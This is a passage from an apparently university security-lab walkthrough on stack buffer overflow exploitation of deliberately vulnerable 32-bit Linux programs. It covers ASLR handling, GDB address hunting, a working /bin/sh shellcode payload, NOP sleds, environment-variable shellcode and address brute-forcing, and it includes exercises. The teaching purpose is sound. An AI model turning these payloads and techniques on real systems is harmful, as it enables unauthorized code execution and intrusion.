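Note that this only reports the system-wide value. A shell started with ''linux32 -3 -R bash -l'' has randomization disabled for its own processes even when the file still reads ''2''.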
If you want to check and enable ASLR in GDB you may use the commands below:
$ gdb -q ./vuln
Reading symbols from ./vuln...done.
gdb-peda$ aslr
ASLR is OFF
gdb-peda$ show disable-randomization
Disabling randomization of debuggee's virtual address space is on.
gdb-peda$ set disable-randomization off
gdb-peda$ show disable-randomization
Disabling randomization of debuggee's virtual address space is off.
gdb-peda$ aslr
ASLR is ON
Let's now also use the same environment for GDB and for the program. In order to do that we clear the environment using the ''env'' command with the ''-i'' option. Let's run the program in GDB with the cleared environment:
$ env -i gdb -q ./vuln
Reading symbols from ./vuln...done.
(gdb) show env
LINES=23
COLUMNS=80
(gdb) unset env LINES
(gdb) unset env COLUMNS
(gdb) show env
(gdb) disass do_nothing_successfully
Dump of assembler code for function do_nothing_successfully:
0x0804847b <+0>: push %ebp
0x0804847c <+1>: mov %esp,%ebp
0x0804847e <+3>: sub $0x58,%esp
0x08048481 <+6>: movl $0x3,-0xc(%ebp)
0x08048488 <+13>: sub $0x8,%esp
0x0804848b <+16>: pushl 0x8(%ebp)
0x0804848e <+19>: lea -0x52(%ebp),%eax
0x08048491 <+22>: push %eax
0x08048492 <+23>: call 0x8048350
0x08048497 <+28>: add $0x10,%esp
0x0804849a <+31>: movzbl -0x52(%ebp),%eax
0x0804849e <+35>: mov %eax,%edx
0x080484a0 <+37>: sar $0x7,%dl
0x080484a3 <+40>: shr $0x5,%dl
0x080484a6 <+43>: add %edx,%eax
0x080484a8 <+45>: and $0x7,%eax
0x080484ab <+48>: sub %edx,%eax
0x080484ad <+50>: movsbl %al,%eax
0x080484b0 <+53>: cmp -0xc(%ebp),%eax
0x080484b3 <+56>: jne 0x80484b9
0x080484b5 <+58>: movb $0x61,-0x52(%ebp)
---Type <return> to continue, or q <return> to quit---
0x080484b9 <+62>: leave
0x080484ba <+63>: ret
End of assembler dump.
(gdb) b *0x08048492
Breakpoint 1 at 0x8048492: file vuln.c, line 10.
(gdb) run
Starting program: /home/razvan/projects/ctf/sss/summerschool2014.git/sessions/sess-09/skel/shellcode-in-stack-buffer/vuln
Provide input data: aaaa
Breakpoint 1, 0x08048492 in do_nothing_successfully (str=0xbffffcc0 "aaaa\n")
at vuln.c:10
10 strcpy(buffer, str);
(gdb) p &buffer
$1 = (char (*)[70]) 0xbffffc56
So we now have a different address for the ''buffer'' variable: ''0xbffffc56''.
Let's try using that address for the payload:
$ perl -e 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80","A"x61,"\x56\xfc\xff\xbf\n"' > payload
$ cat payload - | env -i ./vuln
ps
Segmentation fault
$ dmesg
[150008.596439] vuln[2964]: segfault at 1 ip 00000000bffffc56 sp 00000000bffffdd0 error 6
Unfortunately it still doesn't work so we will try a different approach.
[[http://stackoverflow.com/a/17775966/4804196|This answer]] states that some updates to how you run the program under GDB or outside of it will work. However I didn't manage to make it work. The addresses are still different.
The approach I used makes use of the ''dmesg'' message, which shows us the stack pointer at the time of the crash (''0xbffffdd0''). When the segmentation fault occurs, the ''ret'' instruction has just been executed and the return address has been popped off the stack, so the stack pointer points to the address right after the return address slot. We know the difference between the return address slot and the start of the buffer (''86'' bytes), so the stack pointer at crash time is ''86+4=90'' bytes above the buffer address. We compute the address of the buffer accordingly:
$ python -c 'print(hex(0xbffffdd0-90))'
0xbffffd76
We found out the buffer address: ''0xbffffd76''. Let's reconstruct the payload and test our vulnerable executable:
$ perl -e 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80","A"x61,"\x76\xfd\xff\xbf\n"' > payload
$ cat payload - | env -i ./vuln
ps
PID TTY TIME CMD
2682 pts/1 00:00:01 bash
14783 pts/1 00:00:00 cat
14784 pts/1 00:00:00 sh
14796 pts/1 00:00:00 ps
19602 pts/1 00:00:08 bash
Yes, we've finally done it! We've found out the address of the ''buffer'' variable on the stack and used it to execute the shellcode.
Run the attack on the **same** terminal you used to generate the segmentation fault and find out the ''esp'' address. It's generally a very good idea to run the vulnerable program under ''env -i''.
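The stack pointer arithmetic used above can be sketched in Python as follows. The function name ''buffer_addr_from_crash_sp'' is ours, and the inputs (''0xbffffdd0'' and ''86'') are the values from this particular run.

```python
import struct


def buffer_addr_from_crash_sp(crash_sp, offset, slot_size=4):
    """Recover the buffer address from the stack pointer reported at the crash.

    After `ret` pops the return address, the stack pointer sits `slot_size`
    bytes above the return address slot, which is `offset` bytes above the
    start of the buffer.
    """
    return crash_sp - (offset + slot_size)


if __name__ == "__main__":
    # Values from the dmesg line and the GDB session above (assumed here).
    addr = buffer_addr_from_crash_sp(0xbffffdd0, 86)
    print(hex(addr), struct.pack("<I", addr).hex())
```

The packed form is the 4-byte sequence that goes at the end of the payload, ''\x76\xfd\xff\xbf'' in this run.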
=== Task: Use stack buffer for storing the shellcode on another program ===
Let's do a task similar to the one above. In the ''shellcode-in-stack-buffer-2/'' subfolder from the tasks archive there is a slightly updated vulnerable file. Use the same vulnerability as in the task above to obtain a shell.
=== Task: Buffer is too small: Use another buffer for storing the shellcode ===
It may so happen that the buffer we overflow is too small to store the entire payload (including the shellcode). In such a situation we can't store the shellcode and do the overflow in the same buffer. Instead we store the shellcode somewhere else, similar to the task above where we stored it in a global variable.
In the ''small-stack-buffer/'' folder in the tasks archive you have a setup where the local ''buffer'' variable is only 20 bytes large, unable to store the entire payload. However you may use the ''input_buffer'' variable for storing the shellcode.
Make the attack and get a shell.
One of the nastiest aspects of this task is the way you create the payload. Think about where you will store the shellcode when feeding it as standard input to the program. One of the most troublesome things is the possible overwriting of the ''input_buffer'' variable when using ''strcpy()''. Be careful!
=== Task: Buffer is too small: Use environment variable to store the shellcode ===
Let's make things a bit more challenging. Let's assume we have no room to store the shellcode in the local buffers.
In the ''shellcode-in-envvar/'' subfolder of the tasks archive the ''input_buffer'' and ''buffer'' variables are now ''28'' bytes wide and ''8'' bytes wide, respectively. We have no room to store the shellcode.
In this case we can use another trick. We can define an environment variable, fill it with the shellcode, determine its address and overwrite the function return address with that address.
We recommend you create a file named ''shellcode_payload'' storing the shellcode. The contents of this file are to fill an environment variable.
Use the command below to define an environment variable and fill it with data:
export SHELLCODE=$(cat shellcode_payload)
In order to identify the address where this environment variable is stored, we recommend you add a padding prefix and look for that. For example, when creating the ''shellcode_payload'' file, use ''32'' ''A'' characters and then add the shellcode.
In GDB in order to find a string you may use:
gdb-peda$ find "AAAAAAAA" $esp $esp+1000
The command above looks for the ''%%"AAAAAAAA"%%'' string in the ''$esp, $esp+1000'' range (i.e. starting from the value of the ''esp'' register and ending ''1000'' bytes later).
You should also create an ''overflow_payload'' file for the actual attack, overflowing the ''buffer'' variable and rewriting the return address with that of the start of the shellcode.
In the end you should be able to run the attack through a command such as
cat overflow_payload - | SHELLCODE=$(cat shellcode_payload) ./vuln
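The contents of ''overflow_payload'' can be sketched as padding up to the saved return address followed by the new address in little-endian order. The function name ''build_overflow_payload'' is hypothetical, and both the offset and the address are assumptions that you have to determine yourself in GDB.

```python
import struct


def build_overflow_payload(offset, ret_addr):
    """Return padding up to the saved return address, then the new address.

    offset   -- assumed distance in bytes from the start of `buffer` to the
                saved return address (find the real value in GDB)
    ret_addr -- assumed address of the shellcode inside the environment
                variable (marker address plus the length of the 'A' prefix)
    """
    # "<I" packs a 32-bit unsigned integer in little-endian order (x86).
    return b"A" * offset + struct.pack("<I", ret_addr)
```

Writing the returned bytes to a file opened in binary mode (''"wb"'') gives you the ''overflow_payload'' file used in the command above.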
== Extra: io.smashthestack.org ==
One of the most interesting and approachable security wargames is [[http://io.smashthestack.org/|io.smashthestack.org]]. It's highly recommended you go through as many tasks as possible.
For this session, we will use the 3rd and 5th tasks. They are found in the ''io.smashthestack.org/'' subfolder in the tasks archive.
Go through them, exploit them and profit (i.e. get a shell running).
You must disable ASLR for the tasks to work. You may do that using **either** of the two commands below:
$ echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
$ linux32 -3 -R bash -l
== Tasks ==
[[http://security.cs.pub.ro/hexcellents/res/shellcode-walkthrough-skel.zip|Shellcode Tasks]]
When running the vulnerable executables for the tasks below make sure you have disabled ASLR in your shell:
$ linux32 -3 -R bash -l
=== Call trampoline ===
Another way of working with strings is to declare them as data inside the shellcode. However, if you do this, you won't know their address at compile-time. You have to obtain the address at runtime by abusing the call instruction, like this:
jmp str
back:
pop ecx ; call pushes the return address on the stack, which in our case is precisely the string address
...
str:
call back
db 'Hello, world!'
Write the shellcode that prints "Hello, world!" using this method.
=== Exploit with known buffer address ===
For the following tasks, make sure your shellcodes don't contain any null bytes.
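Null bytes matter because the payload is passed as a C string, so copying stops at the first ''0x00'' byte. A minimal sketch for checking an assembled shellcode is shown below; the helper name ''null_byte_offsets'' is hypothetical.

```python
def null_byte_offsets(shellcode):
    """Return the offsets of all 0x00 bytes in the shellcode."""
    return [i for i, b in enumerate(shellcode) if b == 0]


# "mov eax, 0xb" encodes a 32-bit immediate, so it carries three null bytes.
print(null_byte_offsets(b"\xb8\x0b\x00\x00\x00"))
# "xor eax, eax; mov al, 0xb" sets the same value without any null byte.
print(null_byte_offsets(b"\x31\xc0\xb0\x0b"))
```

An empty list means the shellcode can be passed as a program argument without being truncated.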
Switch to the //1-exact// directory.
You'll have to exploit the vulnerable binary found there and get a shell.
First, write a shellcode that runs execve("/bin/sh", ["sh", NULL], NULL). Use the template found in the //shellcode_template// directory. Run //make// to compile the shellcode and //make test// to compile the test executable.
The complete exploit will go into the //exploit.py// file.
==== Finding the buffer address ====
You'll first run the program under gdb and use it to inspect the addresses. You'll find the buffer address, then you'll use this address in the exploit.
For this to work, we have to assume that when you run the program the buffer address will be the same as the one you found with gdb. In general this is not true, but we can make it so by doing the following:
* you run the program using an absolute path, both when running normally and under gdb (so no "./vuln", but /path/to/vuln)
* you run the program with an empty environment, using ''env -i''
$ env -i /path/to/vuln
* when running under gdb you also run with an empty environment, by running "set exec-wrapper env -i" before executing the "run" command
=== Brute-forcing the buffer address ===
Switch to the //2-bruteforce// directory.
In this scenario we won't be using gdb to find the buffer address, since this method is very theoretical anyway. Instead we'll try every address in some range. To find out this range, we'll use a simple program that prints the value of its stack pointer.
You'll use the //exploit.py// script from the previous task for generating the payload. However, you'll have to modify it so that the return address won't be hardcoded in the script anymore, but taken as a parameter.
Then you have to edit the //run.sh// script to do the following:
* iterate over a range of values for the return address
* for each value use the //exploit.py// script to generate a payload
* run the vulnerable binary using that payload
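The address handling behind these steps can be sketched in Python as follows. The helper names are hypothetical, and the step between candidates is an assumption that depends on how the buffer is aligned. Candidates that contain a null byte are skipped, because the payload is passed as a program argument.

```python
import struct


def parse_address(text):
    """Parse an address such as '0xbffff500' given on the command line."""
    return int(text, 16)


def candidate_addresses(start, end, step):
    """Return the addresses in [start, end) that pack without a null byte."""
    return [addr for addr in range(start, end, step)
            if b"\x00" not in struct.pack("<I", addr)]
```

In //exploit.py// you would call ''parse_address(sys.argv[1])'' instead of using a hardcoded value, while the loop in //run.sh// plays the role of ''candidate_addresses()''.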
==== Guessing a range of values for the return address ====
You'll do this using the //print_stack// executable. Keep in mind that you can't use the value you get from //print_stack// directly. There are a couple of facts you have to take into account:
* the //vuln// binary has the buffer on the stack. That translates into a "sub esp, something" instruction. You have to find this value and subtract it from the value you get from //print_stack//
* you're passing the payload as a parameter. This also causes the stack pointer to decrease. So make sure you also run //print_stack// with a parameter of the same length as the one you're passing to //vuln//
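The arithmetic behind these two points can be sketched as below. The function name and all numeric values are hypothetical; the real frame size comes from the "sub esp, something" instruction in //vuln//, and the slack is how far around the guess you are willing to search.

```python
def estimate_buffer_range(print_stack_esp, frame_size, slack):
    """Return (low, high) bounds for the brute-force search.

    print_stack_esp -- value printed by print_stack when run with a
                       parameter of the same length as the payload
    frame_size      -- assumed amount subtracted from esp in vuln
    slack           -- assumed margin searched on each side of the guess
    """
    guess = print_stack_esp - frame_size
    return guess - slack, guess + slack


low, high = estimate_buffer_range(0xbffff600, 0x100, 0x80)
print(hex(low), hex(high))
```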
=== NOP sled ===
In order to minimize the number of tries required for a successful exploitation you'll use a NOP sled. Start from the //exploit.py// file from the previous task. You can also use //print_stack// to obtain a guess for the return address. In the end you should be able to run the exploit with a line like:
$ ./vuln "$(./exploit.py 0xbfffXXXX)"
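A minimal sketch of a payload laid out with a NOP sled is shown below. The function name ''build_sled_payload'' and the ''tail_pad'' parameter are hypothetical, and ''offset'' is an assumption you have to determine for the //vuln// binary.

```python
import struct

NOP = b"\x90"  # one-byte x86 no-op instruction


def build_sled_payload(shellcode, offset, ret_addr, tail_pad=0):
    """Lay out [NOP sled][shellcode][tail padding][return address].

    offset   -- assumed distance in bytes from the start of the buffer to
                the saved return address
    tail_pad -- optional filler after the shellcode, useful if the shellcode
                pushes data on the stack and would overwrite its own tail
    """
    sled_len = offset - len(shellcode) - tail_pad
    if sled_len < 0:
        raise ValueError("shellcode does not fit before the return address")
    return (NOP * sled_len + shellcode + b"A" * tail_pad
            + struct.pack("<I", ret_addr))
```

Any return address that lands inside the sled reaches the shellcode, so the brute-force step can grow to roughly the sled length.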
=== Environment variables ===
In this scenario the stack buffer is too small to hold the entire shellcode. To overcome this you'll have to place the shellcode in an environment variable. To increase the chance of success, you will also prepend NOPs to the shellcode, as many as the system allows for an environment variable (around 128K).
The //shell.py// file will generate the shellcode to be placed in the environment var.
The //exploit.py// file will generate the actual exploit for the overflow.
This is how you run them:
export A="$(./shell.py)"
./vuln "$(./exploit.py 0xbfffXXXX)"
==== Finding the environment variable address ====
You still have to know what value to overwrite the return address with, that is, the address of the environment variable. To do this, you can write a small program that searches for the variable in the environment and prints its address. Then you use the same address (or something around it) in your exploit, assuming that the environment is roughly the same when passed from the shell to its child processes.